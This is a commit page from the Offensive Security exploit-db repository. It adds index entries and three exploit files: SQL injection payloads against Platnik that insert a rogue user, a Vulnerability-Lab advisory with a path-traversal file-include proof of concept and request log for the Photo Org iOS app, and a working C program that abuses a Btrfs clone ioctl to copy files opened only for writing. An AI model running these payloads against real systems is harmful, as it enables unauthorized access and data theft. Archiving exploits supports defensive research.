Skip to content

Commit a4102ef

Browse files
author
Offensive Security
committed
Updated 07_09_2014
1 parent 2720bb0 commit a4102ef

23 files changed

Lines changed: 2255 additions & 88 deletions

File tree

files.csv

Lines changed: 21 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -30579,7 +30579,6 @@ id,file,description,date,author,platform,type,port
3057930579
33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0
3058030580
33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80
3058130581
33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081
30582-
33955,platforms/php/webapps/33955.txt,"FireEye Malware Analysis System (MAS) 6.4.1 - Multiple Vulnerabilities",2014-07-02,kmkz,php,webapps,0
3058330582
33957,platforms/php/webapps/33957.txt,"kloNews 2.0 'cat.php' Cross Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0
3058430583
33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0
3058530584
33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products 'n6plugindestructor.asp' Cross Site Scripting Vulnerability",2010-05-07,"Ruben Santamarta ",asp,webapps,0
@@ -30610,3 +30609,24 @@ id,file,description,date,author,platform,type,port
3061030609
33985,platforms/php/webapps/33985.txt,"NPDS Revolution 10.02 'topic' Parameter Cross Site Scripting Vulnerability",2010-05-13,"High-Tech Bridge SA",php,webapps,0
3061130610
33986,platforms/php/webapps/33986.txt,"PHP File Uploader Remote File Upload Vulnerability",2010-01-03,indoushka,php,webapps,0
3061230611
33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 'signupconfirm.php' Cross Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0
30612+
33988,platforms/php/remote/33988.txt,"PHP 5.x 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0
30613+
33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet Arbitrary File Upload",2014-07-07,metasploit,windows,remote,9002
30614+
33990,platforms/multiple/remote/33990.rb,"Gitlist Unauthenticated Remote Command Execution",2014-07-07,metasploit,multiple,remote,80
30615+
33991,platforms/php/remote/33991.rb,"Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload",2014-07-07,metasploit,php,remote,80
30616+
33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 Multiple SQL Injection Vulnerabilities",2010-05-17,podatnik386,asp,webapps,0
30617+
33993,platforms/php/webapps/33993.txt,"Planet Script 1.x 'idomains.php' Cross Site Scripting Vulnerability",2010-05-14,Mr.ThieF,php,webapps,0
30618+
33994,platforms/php/webapps/33994.txt,"PonVFTP Insecure Cookie Authentication Bypass Vulnerability",2010-05-17,SkuLL-HackeR,php,webapps,0
30619+
33995,platforms/multiple/webapps/33995.txt,"Blaze Apps 1.x SQL Injection and HTML Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",multiple,webapps,0
30620+
33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Include Vulnerability",2014-07-07,Vulnerability-Lab,ios,webapps,0
30621+
33997,platforms/php/webapps/33997.txt,"NPDS Revolution 10.02 'download.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0
30622+
33998,platforms/php/webapps/33998.html,"JoomlaTune JComments 2.1 Joomla! Component 'ComntrNam' Parameter Cross-Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0
30623+
33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 'chatsmileys.php' Cross Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0
30624+
34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 BETA 'list' Parameter Cross Site Scripting Vulnerability",2010-01-18,indoushka,multiple,webapps,0
30625+
34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x Btrfs Cloned File Security Bypass Vulnerability",2010-05-18,"Dan Rosenberg",linux,local,0
30626+
34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 Remote Buffer Overflow Vulnerability",2010-05-18,"fl0 fl0w",windows,remote,0
30627+
34003,platforms/php/webapps/34003.txt,"Percha Image Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
30628+
34004,platforms/php/webapps/34004.txt,"Percha Fields Attach 1.0 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
30629+
34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
30630+
34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
30631+
34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
30632+
34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0

platforms/asp/webapps/33992.txt

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
source: http://www.securityfocus.com/bid/40201/info
2+
3+
Platnik is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
Platnik 8.01.001 is affected; other versions may also be vulnerable.
8+
9+
INSERT INTO dbo.UZYTKOWNIK VALUES('LOGIN', 'TEST', 'TEST', 'password hash', '2010-02-28 15:46:48', null, 'A', null)--
10+
INSERT INTO dbo.UPRAWNIENIA VALUES(id_user, id_platnik)--
11+
or 1=1--

platforms/ios/webapps/33996.txt

Lines changed: 237 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,237 @@
1+
Document Title:
2+
===============
3+
Photo Org WonderApplications v8.3 iOS - File Include Vulnerability
4+
5+
6+
References (Source):
7+
====================
8+
http://www.vulnerability-lab.com/get_content.php?id=1277
9+
10+
11+
Release Date:
12+
=============
13+
2014-07-04
14+
15+
16+
Vulnerability Laboratory ID (VL-ID):
17+
====================================
18+
1277
19+
20+
21+
Common Vulnerability Scoring System:
22+
====================================
23+
7.1
24+
25+
26+
Product & Service Introduction:
27+
===============================
28+
Create great photo albums and video diaries with PhotoOrg. Keep your photo album and video diary secured with passwords.
29+
Share your photo albums and video diary on Facebook, Twitter, Youtube, Picasa, Flickr and MySpace with family, friends
30+
and business associates.
31+
32+
Photo Editor with the following ability:
33+
-Over eleven photo effects
34+
-Four different photo enhancer
35+
-Rotate and flip photo
36+
-Crop photo
37+
-Change photo brightness
38+
-Change photo Contrast
39+
-Change photo saturation
40+
-Change photo sharpness
41+
-Draw on photo with different colors
42+
-Write text on your photo
43+
-Remove red eyes
44+
-Whiten photo
45+
-Remove blemish on photo
46+
47+
Features:
48+
-view your pictures and videos using your browser
49+
-upload your picture and video using your browser
50+
-upload video to Youtube, Picasa, Facebook, Twitter, Flickr and MySpace
51+
-upload multiple pictures to Facebook, Twitter, Flickr and MySpace
52+
-Keep your photo and videos organized the way you like it
53+
-Keep your photo and video secured with password
54+
-copy your photo and video from anywhere and paste them into the application
55+
56+
57+
( Copy of the Homepage: https://itunes.apple.com/us/app/photo-org/id330740156 )
58+
59+
60+
Abstract Advisory Information:
61+
==============================
62+
The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official WonderApplications Photo Org v8.3 iOS web-application.
63+
64+
65+
Vulnerability Disclosure Timeline:
66+
==================================
67+
2014-07-04: Public Disclosure (Vulnerability Laboratory)
68+
69+
70+
Discovery Status:
71+
=================
72+
Published
73+
74+
75+
Affected Product(s):
76+
====================
77+
WonderApplications
78+
Product: Photo Org L - iOS Mobile Application 8.3
79+
80+
81+
Exploitation Technique:
82+
=======================
83+
Local
84+
85+
86+
Severity Level:
87+
===============
88+
High
89+
90+
91+
Technical Details & Description:
92+
================================
93+
A local file include web vulnerability has been discovered in the official WonderApplications Photo Org v8.3 iOS web-application.
94+
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
95+
path commands to compromise the mobile web-application.
96+
97+
The web vulnerability is located in the `filename` value of the `uploadMedia` (uploadfile) module. Remote attackers are able to inject
98+
own files with malicious `filename` values in the `uploadMedia` POST method request to compromise the mobile web-application. The local
99+
file/path include execution occcurs in the index file/folder list context next to the vulnerable name/path value. The attacker is able
100+
to inject the local file request by usage of the available `wifi interface` for file exchange/share.
101+
102+
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute
103+
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to
104+
inject is POST.
105+
106+
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system)
107+
count of 7.1. Exploitation of the local file include web vulnerability requires no privileged web-application user account but low
108+
user interaction. Successful exploitation of the local file include web vulnerability results in mobile application or connected
109+
device component compromise.
110+
111+
112+
Request Method(s):
113+
[+] [POST]
114+
115+
Vulnerable Service(s):
116+
[+] WonderApplications - WiFi Share
117+
118+
Vulnerable Module(s):
119+
[+] uploadMedia
120+
121+
Vulnerable Parameter(s):
122+
[+] filename
123+
124+
Affected Module(s):
125+
[+] Index File/Folder Dir Listing (http://localhost:[port-x]/)
126+
127+
128+
Proof of Concept (PoC):
129+
=======================
130+
The local file inlcude web vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction.
131+
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
132+
133+
134+
PoC: WonderApplications (Photo & Video) - Index- & Sub-Categories
135+
136+
<html><head><style type="text/css">
137+
ul {float:left; width:100%; padding:0; margin:0; list-style-type:none; }
138+
a { float:left; width:6em; text-decoration:none; color:white; background-color:purple; padding:0.2em 0.6em; border-right:1px solid white; }
139+
a:hover {background-color:#ff3300} li {display:inline} table {float:left} </style></head>
140+
<body><h1 style="color:orange;text-align:center">WonderApplications</h1><ul> <li><a href="Photo_33457298432">Foto</a></li>
141+
<li><a href="Video_33457298432">Video</a></li> <li><a href="Load_33457298432">Load</a></li> </ul><table border="1"><tbody><tr><td>
142+
<a href="abcde"><img src="http://localhost:8080/var/mobile/Applications/FB0FAD2F-8D06-4485-879B-0452C05067EC/Documents/mediaPath/00/C01FCCB0-DBDA-4A80-8C6A-67F02D3FE0A9.PNG" alt="abcde"></a>
143+
<br \=""> abcde </td><td> <a href="abcdef ././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip">
144+
<img src="http://localhost:8080/././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip/
145+
FB0FAD2F-8D06-4485-879B-0452C05067EC/Documents/mediaPath/00/6EFCA2A7-E8F8-4251-8EFB-85EF327998FF.PNG"
146+
alt="abcdef <././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip"></a> <br \="">
147+
abcdef <././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip">
148+
</td></table></body></html></iframe></td></tr></tbody></table></body></html>
149+
150+
151+
--- Poc Session Logs [POST] ---
152+
Status: 200[OK]
153+
POST http://localhost:8080/uploadMedia Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[unknown] Mime Type[unknown]
154+
Request Header:
155+
Host[localhost:8080]
156+
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0]
157+
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
158+
Accept-Language[de,en-US;q=0.7,en;q=0.3]
159+
Accept-Encoding[gzip, deflate]
160+
Referer[http://localhost:8080/uploadMedia]
161+
POST-Daten:
162+
POST_DATA[-----------------------------276732337522317
163+
Content-Disposition: form-data; name="file"; filename="././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip"
164+
Content-Type: application/zip
165+
-
166+
167+
20:40:52.394[62ms][total 79ms] Status: 200[OK]
168+
GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2874] Mime Type[text/html]
169+
Request Header:
170+
Host[localhost:8080]
171+
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0]
172+
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
173+
Accept-Language[de,en-US;q=0.7,en;q=0.3]
174+
Accept-Encoding[gzip, deflate]
175+
Connection[keep-alive]
176+
Response Header:
177+
Connection[Keep-Alive]
178+
Content-Type[text/html]
179+
Content-Length[2874]
180+
181+
182+
183+
184+
Reference(s):
185+
http://localhost:8080/
186+
http://localhost:8080/uploadMedia
187+
http://localhost:8080/var/mobile/Applications/
188+
189+
190+
Solution - Fix & Patch:
191+
=======================
192+
The local file include web vulnerability bug can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request.
193+
Encode also the filename value in the file dir listing of the index and sub categories.
194+
Restrict the filename value name input and prevent executions by a secure file filter on upload extension or the name validation itself.
195+
196+
197+
Security Risk:
198+
==============
199+
The security risk of the local file include web vulnerability in the filename value is estimated as high.
200+
201+
202+
Credits & Authors:
203+
==================
204+
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
205+
206+
207+
Disclaimer & Information:
208+
=========================
209+
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
210+
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
211+
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
212+
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
213+
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
214+
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
215+
216+
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
217+
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
218+
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
219+
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
220+
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
221+
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
222+
223+
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
224+
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
225+
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
226+
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
227+
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
228+
229+
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
230+
231+
232+
--
233+
VULNERABILITY LABORATORY RESEARCH TEAM
234+
DOMAIN: www.vulnerability-lab.com
235+
CONTACT: research@vulnerability-lab.com
236+
237+

platforms/linux/local/34001.c

Lines changed: 29 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
source: http://www.securityfocus.com/bid/40241/info
2+
3+
The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation.
4+
5+
An attacker can exploit this issue to clone a file only open for writing. This may allow attackers to obtain sensitive data or launch further attacks.
6+
7+
#include <fcntl.h>
8+
#include <sys/ioctl.h>
9+
#include <stdio.h>
10+
#include <stdlib.h>
11+
12+
#define BTRFS_IOC_CLONE _IOW(0x94, 9, int)
13+
14+
int main(int argc, char * argv[])
15+
{
16+
17+
if(argc < 3) {
18+
printf("Usage: %s [target] [output]\n", argv[0]);
19+
exit(-1);
20+
}
21+
22+
int output = open(argv[2], O_WRONLY | O_CREAT, 0644);
23+
24+
/* Note - opened for writing, not reading */
25+
int target = open(argv[1], O_WRONLY);
26+
27+
ioctl(output, BTRFS_IOC_CLONE, target);
28+
29+
}

0 commit comments

Comments
 (0)